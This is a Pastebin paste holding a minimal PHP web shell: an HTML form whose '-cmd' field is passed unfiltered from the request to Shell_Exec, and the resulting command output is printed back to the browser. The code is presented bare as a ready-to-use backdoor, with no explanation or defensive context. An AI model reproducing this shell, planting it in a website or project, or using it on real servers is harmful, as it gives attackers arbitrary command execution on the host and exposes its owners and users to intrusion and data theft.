Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <html>
- <body bgcolor=#000000 text=#00ff00 ">
- <form method=POST>
- <br>
- <input type=TEXT name="-cmd" size=64 value="<?=$cmd?>"
- style="background:#000000;color:#ffffff;">
- <hr>
- <pre>
- <? $cmd = $_REQUEST["-cmd"];?>
- <? if($cmd != "") print Shell_Exec($cmd);?>
- </pre>
- </form>
- </body>
- </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement